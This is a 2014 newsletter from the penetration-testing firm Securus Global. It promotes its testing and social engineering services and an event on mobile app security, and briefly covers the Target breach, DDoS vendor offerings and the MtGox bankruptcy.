Facebook icon Twitter icon Forward icon

Testing New Technologies – Smoke Detection, Alarms, CCTV etc.

In the last couple of years, we’ve been called upon to test a wide range of new technologies that software (and hardware) product vendors are developing and our clients are implementing.

All of these systems are forming part of an organisation’s critical infrastructure - IP based management and monitoring systems; smoke detection systems, alarm systems, CCTV systems, to name a few.

From our experience, we’ve not had one that has passed with a clean bill of health after our security testing. With, almost all having to later work with the Securus Global team to help them fix up bugs in their software.

If you are implementing or have implemented such systems, make sure you are testing them in-line with the rest of your testing program and make sure you are engaging with experienced and capable testers to do so. These are not point and click exercises with tools.

The last thing you want is for your systems to be compromised and someone to be able to set off your smoke detectors, turn your alarms off and on, control your CCTV and in an extreme scenario, (and we did this), be able to open doors at will at your branch locations.

As with all new technology you are buying, speak with the developers/vendors and ask them about how they security test, get proof they do it and don’t implement unless you are confident of what you are being told and that to a good degree of certainty, you have confidence in the system. Even then, the small investment to test it yourself with Securus Global, or another vendor of choice that can do it for you, may save you a lot of future pain. We have seen many cases where a certain technology is just not mature enough and we’ve saved our clients not only from a security perspective but potentially millions of dollars in investment in poor technology.

Contact us if would like to discuss your situation.

Cracking .NET Membership Password Hashes

There are times when our penetration testing work can seem like a lot of stabbing in the dark with a bit of black magic thrown into the mix for good measure. To help dispel these myths, we've recently written up the background to some of our more interesting findings to either explain what we do and show how you can play along at home.

Following on from his recent post on Dumping Windows Credentials, Sebastien Macke has provided some insight into how we go about cracking password hashes when we get access to them.

Read on at: https://www.securusglobal.com/community/2014/02/25/cracking-net-membership-password-hashes/

The “most asked question” – What should companies do to minimise their security risks?

This is the question our CEO, Drazen Drazic receives the most when being interviewed by the press or when sitting with boards and CEOs. We asked Drazen to go through how he answers this question:

I haven’t changed my thoughts on how I answer this in my whole time in this industry; I say; Same as 10 years ago. Same as 20 years ago. Get your basics right from the outset before you look to software and other tools to do it for you. They [tools] won’t do the job for you unless you have the fundamentals in place. Sort out your systems, processes, assets and people in regards to security before you put any reliance on security tools.

Develop a framework for how you think and approach your security risk management program. We’ve always used our own framework we developed about 15 years ago called the SSMF – Strategic Security Management Framework. In brief, it covers the following categories with the success of each, dependant upon all the successful deployment of each of the previous layers:

1. Management and Governance: If the CEO and Senior Officers of the business do not ultimately own the responsibility and accountability for the security of the business, then it just does not get the appropriate attention and support throughout the business. This is the number one key point!

Read the full article here: https://www.securusglobal.com/community/2014/02/27/the-7-reasons-why-businesses-are-insecure/

Upcoming Events - Breakfast Brief

Hacking Mobile Applications - Industry Case Studies.

Presenter: Michael Gianarakis (Senior Security Consultant)
When: Tuesday 1st April, 8am breakfast, followed by presentation.
Location: Securus Global's Melbourne Office - Level 8, 50 Queen St.

Synopsis:
With the significant growth in mobile commerce due to the mass adoption and rapid innovation of mobile platforms has put a bulls eye on these systems by people who see other challenges by their introduction.

While the growth of mobile commerce has presented many opportunities for online retailers to expand their business and improve customer engagement, it's also created a lucrative target for hackers. We know. We see it every day in our line of business.

This session will give you an insight into what can go wrong, how it has gone wrong for some companies, and provide you with our experience examining the security of mobile applications and assisting clients from a variety of sectors, including major financial institutions, retail and through to media companies whose businesses depend on the security of their data.

Contact us to reserve your place: info@securusglobal.com

Would be great to see you there!

Mitigate DDoS Attacks with Cloud & On-Premise DDoS Protection

No organization is safe from the threat of Distributed Denial of Service (DDoS) attacks. Cyber criminals, hacktivists and nation states have targeted companies in virtually every industry in recent years. These DDoS attacks are financially devastating and cost organizations on average, $27 million for a 24-hour website outage. In 2013, DDoS attacks averaged 2.7 Gbps with many attacks exceeding 50 Gbps of throughput. DDoS attacks are more devastating than ever.

Imperva delivers a hybrid on-premise and cloud solution to stop both sophisticated application-layer attacks and multi-gigabit network DDoS attacks.

Key Capabilities:

  • Stop large-scale network DDoS attacks before they reach your network
  • Avoid application outages and brand damage
  • Protect in minutes with effortless deployment
  • Leverage real-time 24x7 assistance from Imperva's DDoS security experts
  • Lower costs by eliminating need to over-provision bandwidth

5 Critical Steps of a Complete Security Risk & Compliance Lifecycle

Security and compliance remain at the forefront of concerns facing security leaders today. Tackling the challenge of finding and addressing risks in the enterprise while demonstrating compliance with increasingly demanding regulations requires the maturity and discipline to adopt and follow a complete security risk and compliance lifecycle.

Tripwire worked with clients to capture and distill the five critical steps that successful organizations take to reduce risk, demonstrate compliance and answer the most important questions in today’s compliance-driven enterprise:

  • How secure and compliant is our network?
  • Which top issues must we address today to improve security and achieve compliance?
  • Who is accountable and how are they doing?

What makes good application security knowledge?

This story about the Target security breach has continued to unravel. Had it not been for patterns of card fraud identified by others and not Target, they would probably still be oblivious to the fact they had been compromised and had been for some time.
http://www.nytimes.com/2014/01/18/business/a-sneaky-path-into-target-customers-wallets.html?ref=business&_r=1

We could tell you that penetration testing could potentially have negated this risk to the company, and it may well have, but the truth is that a company’s security position is rarely, if ever substantially increased by just regular penetration testing.

Read this article by Drazen Drazic from 2010 that looks deeper into Application and Systems security:
http://tek-tips.nethawk.net/looking-at-what-makes-good-application-security-knowledge/

New Securus Global Social Engineering Services

In our last newsletter, we posted a case study on “spear-phishing” and the ease with which such attacks, if planned out well, can succeed:
https://www.securusglobal.com/community/2013/12/05/does-spear-phishing-work/

Whilst many companies carry out technical penetration and other security tests, its interesting to see so few who are actually addressing the concerns of “social-engineering” based attacks.

We believe that there are numerous reasons for this, ranging from the belief that there that can be done to stop such attacks from occurring, right through to companies simply not being aware of just how prevalent such attacks can be or not wanting to “hack humans”.

As we’ve said before, if someone wants to target your organisation, they will generally focus on the path of least resistance for success. In a lot of cases, that doesn’t involve just looking for vulnerabilities in your information systems (traditional “hacking") to find a way in, when a couple of phone calls or other carefully crafted social engineering attacks can achieve the desired result faster and with less chance of detection.

Securus Global has been helping clients minimise their security risks against social engineering attacks now for many years and in 2014, we’ve expanded our services in this field to a level we believe no one else is doing at the moment.

Our Red Cell services continue to evolve, however the more interesting developments are our new self-service offerings that will allow our clients to create their own testing programs – at their own pace, customisation and analysis and tracking. Read more about this here: https://www.securusglobal.com/services/assessment-and-assurance-services/red-cell-assessments/

For further information, please contact us.

Industry Round-up

Tokyo MtGox Bitcoin exchange files for bankruptcy:

THE troubled MtGox Bitcoin exchange has filed for bankruptcy protection in Japan, with its chief executive saying it had lost nearly half a billion dollars worth of the digital currency in a possible theft.

Mark Karpeles, who has not been seen in public for several days, re-emerged to tell a press conference that his firm’s digital vaults had been almost completely emptied.

“We have lost Bitcoins due to weaknesses in the system,’’ French-born Karpeles said in Japanese.

Karpeles said MtGox had liabilities of 6.5 billion yen ($71 million) and that around a million users had been affected when hackers broke into the exchange in early February.

Read more: http://mobile.news.com.au/finance/tokyo-mtgox-bitcoin-exchange-files-for-bankruptcy/story-e6frfm1i-1226841536953

Securus Global - Community

Connect, Follow or Like us on social media: LinkedIN / Twitter / Facebook

And make sure to checkout our team blog and other industry news that we publish regularly on our website here: https://www.securusglobal.com/community/